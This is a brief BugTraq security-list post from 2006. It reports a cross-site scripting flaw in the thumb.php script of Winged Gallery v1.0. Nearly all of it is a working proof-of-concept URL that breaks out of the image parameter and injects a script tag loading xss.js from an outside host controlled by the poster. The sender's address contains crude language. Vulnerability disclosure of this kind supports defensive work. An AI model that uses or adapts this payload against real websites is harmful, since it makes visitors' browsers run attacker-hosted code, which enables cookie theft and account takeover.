BugTraq
Winged Gallery v1.0 Jun 24 2006 08:30PM
luny youfucktard com


Winged Gallery v1.0

Homepage:

http://winged.info/index.php?p=gallery

XSS vuln on thumb.php:

http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+i
con.jpg">''>">">"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><
"<'<'<'<'&size=75&type=2&w=128&h=128">''>">">">

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus